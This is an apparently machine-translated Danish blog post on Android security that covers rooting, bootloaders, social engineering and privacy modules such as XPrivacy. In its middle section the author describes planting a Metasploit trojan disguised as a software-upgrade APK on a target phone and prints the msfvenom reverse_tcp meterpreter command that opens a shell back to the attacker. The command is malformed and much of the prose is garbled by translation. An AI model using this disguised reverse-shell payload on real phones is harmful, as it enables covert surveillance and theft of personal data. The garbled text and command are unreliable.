Billedkilde: pixabay.com

Introduktion til Android

I dette emne skal vi lære om Android og Open Source Security (OS). Android er en Open Source-platform. Det ligner Linux, men stadig alt for anderledes end Linux. Linux er alt for modnet sammenlignet med Android. Så dette er Chetan Nayak, og velkommen til min næste blog om Open Source Web Security. Jeg har skrevet denne blog, idet jeg antager, at de fleste af os ville bruge Android K, dvs. Kitkat eller Android L dvs. Lollipop.

Årsagen var Gingerbread og Jellybean havde masser af open source sikkerhedsproblemer, som jeg ikke kan diskutere i denne ene blog. Så måske vil jeg diskutere det næste gang, når jeg går dybere ned i de ældre versioner af Android. Så nu skal vi holde os til KitKat og Lollipop.

Android blev designet med udviklere i tankerne. Sikkerhedskontrol blev designet til at reducere byrden for udviklere. Sikkerhedskyndige udviklere kan nemt arbejde med og stole på fleksible sikkerhedskontroller. Udviklere, der er mindre fortrolige med sikkerhed, vil blive beskyttet af sikre standarder.

Begyndelsen

Jeg var ikke meget inde på androidskabet, indtil det senere kvartal af 2013, da jeg havde min første Android-mobiltelefon, som var Sony Xperia L (baseret på 4.2.2 fra da). Heck, jeg hadede endda Android, fordi det var ekstremt laggy, især Samsung-enheder. Jeg overvejede endda at købe en Windows Lumia dengang, men heldigvis brugte jeg en masse spil, og jeg var nødt til at købe Xperia L, da denne celle var Lag Proof. Det havde cirka 1 gig RAM og Adreno 305. Cool nok til at køre noget.

Efter at have spillet masser af spil som NOVA3 og ModernCombat4, blev jeg keder af den celle inden for en måned. Jeg vidste, at Android var baseret på Linux, og jeg ville gøre nogle af mine ændringer til det. Jeg begyndte at læse om tilpasninger og lærte om, hvad der blev kaldt 'rodning'. Da jeg havde en god backhand i Linux, var rooting ikke et problem med mig. Med lidt hjælp fra XDA var jeg i stand til at rodfæste min celle.

Men så ramte noget mig. Så snart min celle blev genstartet efter rodning, begyndte den netop boot-looping (sidder fast på startskærmen for evigt). Jeg vidste ikke engang, hvad bootloader var i Android. Så der var intet, jeg kunne gøre. Det var kun en måned, hvor jeg købte min nye celle, og min celle blev nu blød muret. Jeg har altid læst, at rodfæstning er farlig, men jeg vidste ikke, at det ville miste min celle. Men jeg tog fejl. Da jeg fortsatte med at læse en og anden ting om rodfæstelse, lærte jeg, at rodfæstelse ikke murer din telefon.

Rooting ligner bare og Admin Access på en computer (Faktisk er det en System Access, men jeg skrev Admin Access, så det er let at forstå for noobs.). Dette betyder, at rodfæstelse aldrig vil miste din telefon. Det var bootloaderen, der murede min telefon. For folk, der ikke kender bootloader, er; bootloader ligner BIOS i windows. (Hvis du ikke ved, hvad BIOS er, skal du ikke engang læse og tænke på sikkerhed i første omgang.) Bootloader eller Hboot (det er, hvad det hedder i Android), det er den første ting, der kører, når du starter din Android op apparat.

Det pakker instruktionerne til at starte operativsystemkernen, og de fleste af dem er specifikt designet til at køre deres eget debugging eller ændringsmiljø.

Android-sikkerhedskontrollen

Tænk på bootloader som sikkerhedskontrol for din enhed. Hvis du bryder dette kontrolpunkt, vil du miste alt, hvad du har på din telefon. Så det er en god sikkerhedsfunktion, siger jeg. For hvis du mister din telefon, og nogen forsøger at få rodadgang for at omgå låsen (forudsat at du har låst din enhed med en pin eller adgangskode.), Bliver han obligatorisk nødt til at låse op bootloaderen, hvilket vil resultere i sletning af dine data i telefonen.

Så du behøver ikke at bekymre dig om, at nogen misbruger det. Så det samme er tilfældet med brugerdefinerede ROMS. ROM'er er operativsystemer baseret på Android-versioner, der specifikt er designet til din hardwarearkitektur. Så hvis du tjekker på XDA for din telefon, vil du have et antal tilpassede ROM'er til dine telefoner, nogle af de mest berømte er Cyanogen Mod ROM'er, som allerede er forankret og leveres med et foruddefineret sæt tilpasninger .

Sikkerhedsoverskridelsen af ​​Android

Du tænker muligvis på nuværende tidspunkt, at du har en sikker mobiltelefon. Men jeg er her for at bevise, at du forkerer igen, og det er hele pointen med denne blog. I andet kvartal af 2014 var folk allerede begyndt at udvikle exploits og rootkits til Android, som kunne rodfæste dine mobiltelefoner uden engang at låse op for bootloaders.

Ikke skræmmende nok? Lad mig fortælle dig den farligste del. De kunne endda installere trojanere inde i det. Så selv om politiet kan spore cellen, og du endda får din celle tilbage, er der stadig en stor risiko for, at de kunne se alt, hvad du gør på din telefon. Dette er noget, som jeg har prøvet som et eksperiment i et faktisk praktisk miljø.

Jeg brugte Metasploit til dette angreb. Hvad jeg gjorde var, at jeg oprettede en Trojan og installerede den i måltelefonen. Det var en simpel apk-fil, og jeg kaldte den en softwareopgradering. Så hvis brugeren bare er en almindelig mand med kun bit og byte af information om sikkerhed, så tør han ikke engang fjerne det. Og jeg sørgede for, at når Internettet er aktiveret, vil malware, jeg oprettede, automatisk køre sig selv og oprette forbindelse tilbage til min fjernport på værtsmaskinen.

Følgende kommandoer blev brugt til angrebet (Metasploit er en penetrationstestesoftware, der hjælper med at kontrollere sårbarheder på en platform eller specifikke enheder.)

Min vært IP-adresse: 192.168.xx.xx

Min værtport (for at oprette forbindelse tilbage til): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Så her oprettede jeg en omvendt TCP-kanal på min computer. Så hver gang Internettet starter på Android, får jeg en skal åbnet på min Kali-maskine eller den maskine, hvor jeg har installeret Metasploit.

Så nu ved du, hvor skræmmende det er for en person, som du ikke engang kender, har poster over hver transaktion, du udfører gennem din celle, enhver anden kontakt, WhatsApp-meddelelser, SMS, Viber og Skype-opkaldslog og alt. Hvis det ikke er skræmmende, ved jeg ikke, hvad der er.

Anbefalede kurser

  • Certifikationskursus i rubin debugging
  • Komplet PHP MySQL-kursus
  • Online certificeringskursus i VB.NET-programmering
  • Online-kursus om ITIL Foundation

Dækningen

Nok om sikkerhedsspørgsmål. Vi ved alle, at enhver anden platform har sikkerhedsproblemer. Hvordan kunne vi være sikre da? Dette er ikke nøjagtigt sandt. Platforme kan sikres op til et specifikt punkt, men efter det er det op til os at sikre, at det forbliver sådan. Der er et berygtet citat i sikkerhedsverdenen:

“Social engineering: Fordi der ikke er noget program for menneskelig dumhed”

Jeg hørte denne sætning for længe siden, da jeg så en Conference of DefCon.

Når der ikke er nogen teknisk sårbarhed at udnytte, skal du prøve at hacke mennesker. Og med det mener jeg ikke hypnotisme og ting. Jeg mener Social Engineering. Du kan læse min anden blog “Betydningen af ​​cybersikkerhed i vores daglige liv” for mere info om dette.

Kernesikkerhedsfunktion af Android

Desuden social engineering, som er noget, der kun kan tages hånd om, hvis du er smart; der er måder, hvorpå du kan udvikle Android-applikationer på en sikker måde for at sikre, at det forbliver på den måde.

Så her er nogle af de vigtigste sikkerhedsfunktioner, der hjælper dig med at opbygge sikre apps:

  • Android-applikationssandkassen, der isolerer dine appdata og kodeudførelse fra andre apps.
  • En applikationsramme med robuste implementeringer af fælles sikkerhedsfunktionalitet såsom kryptografi, tilladelser og sikker IPC.
  • Et krypteret filsystem, der kan aktiveres til at beskytte data på mistede eller stjålne enheder.
  • Brugertildelte tilladelser til at begrænse adgangen til systemfunktioner og brugerdata.
  • Applikationsdefinerede tilladelser til at kontrollere applikationsdata per app-basis.

Hvad kan du gøre, hvis du vil have et sikkert miljø, men ikke er en udvikler?

Fra Android 5 dvs. Lollipop giver det en funktion, hvor brugeren kan tilføje flere profiler og begrænsede tilstande til brug af telefoner og tablets. Derudover, hvis du har rodfæstet din telefon, er der Android-apps i Xposed-moduler som AppOps, Xprivacy eller Privacy Guard, som kan hjælpe dig med at tage sig af næsten alt. Du skal installere Xposed Framework til det.

Xposed Framework er det, der giver Xposed-moduler mulighed for at arbejde. Xposed-moduler giver dig mulighed for at ændre adfærd for Apk-filer og systemfiler uden at skulle installere en anden ROM. Det er også let at fortryde ændringerne, så der er lidt risiko her, og det er ikke engang tidskrævende, da der ikke er behov for at blinke flere ROMS, kerner og deres fejlrettelser.

Xprivacy, Privacy Guard og AppOps er moduler, der er udsat, som giver dig mulighed for at gøre din Android sikker ved at vælge, hvilken app der skal have adgang til hvad såsom internettet, tastatur, sdcard, root-adgang og masser af andre ting. Du kan endda deaktivere adgang til kun specifikke tjenester og oprette brugerdefinerede skabeloner til det. Hvad angår mig, foretrækker jeg at vælge Xprivacy. Men her er nogle info eller forskelle, hvis du beder om at variere for at vælge mellem ovenstående tre.

AppOps:

Dette blev oprindeligt introduceret af Google i Android 4.3. (Dette er den vigtigste grund til at jeg ikke støtter det. Jeg stoler ikke på Google. Kald det Paranoia, men google sporer alt hvad du gør. Og jeg har ikke brug for nogen til at holde styr på alt hvad jeg gør, men hvis du stoler på Google, gå efter det.). Den vigtigste begrænsning af AppOps er, at Google kun giver dig mulighed for at blokere adgang til de apps, som den vil have dig til at blokere.

Den betydning, hvis du vil blokere apps, der er relateret til Google, såsom Play Services (som faktisk bruger mere end 50% af din normale hukommelse, batteri og data (internet)), kan du ikke. Dette er endnu en grund til, at jeg hader Google. Så jeg tror, ​​at AppOps kun er en malware for mig. (men det er bare mig, der tænker på den måde, det er ikke hvis du stoler alene på Google)

Privacy Guard:

Privacy Guard er et brugervenligt interface, der er lavet til erstatning for AppOps af Cyanogen Mod. Hvis du er nybegynder, så foreslår jeg, at du bruger dette, da det kun har en tænd / sluk-knap og selvdefinerede skabeloner til, hvilken type app der skal have adgang til hvad. Dette er ikke så sikkert, hvis der er en malware, der fungerer eller forpligter som en systemapp. Men det er godt at komme i gang.

Xprivacy:

Xprivacy er et alt i ét værktøj. Men det er rettet mod eksperter. Du kan sammenligne det med en schweizisk hærkniv. Den har alt i det og kan gøre din telefon sikker på enhver anden måde, men hvis du ikke ved, hvad du laver, vil den kun rodet din telefon og forhindre, at apps endda starter. Du kan også begrænse adgangen til systemapps. Dette er hvad jeg personligt foretrækker at vælge.

Udover de ovennævnte moduler er der endda andre moduler såsom Lightening Firewall eller BootManager i Xposed, som kan hjælpe med at begrænse adgangen til internettet for bestemte apps og forhindre apps i at starte op langs systemet, når du genstarter en telefon.

Så det ville være det for denne blog. I tilfælde af sikkerhedsmæssige problemer kan du helt sikkert besøge eller være medlem af XDA-webstedet, hvilket kan give dig meget mere information om privatlivets fred.

Anbefalede artikler: -

Dette har været en guide til Android. Her drøftede vi grundlæggende koncept, sikkerhedskontrolpunkter og kerne-sikkerhedsfunktion i Android. Du kan også gennemgå vores andre foreslåede artikler for at lære mere -

  1. Spørgsmål til Android-interview - Top 10 nyttige spørgsmål
  2. 8 nyttige Siri-alternativer til Android
  3. 28 bedste tip og tricks til udviklingsværktøjer til Android-apps
  4. Karrierer inden for Android-udvikling

Kategori: